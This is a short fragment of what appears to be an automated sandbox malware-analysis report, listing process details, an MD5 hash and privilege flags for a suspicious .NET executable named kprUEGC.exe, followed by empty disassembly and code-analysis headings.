                                                                  Path:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe"
                                                                  Imagebase:0x970000
                                                                  File size:512000 bytes
                                                                  MD5 hash:5CBAC1B17CEF2BC95F5B18F87EC1DE49
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:low

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >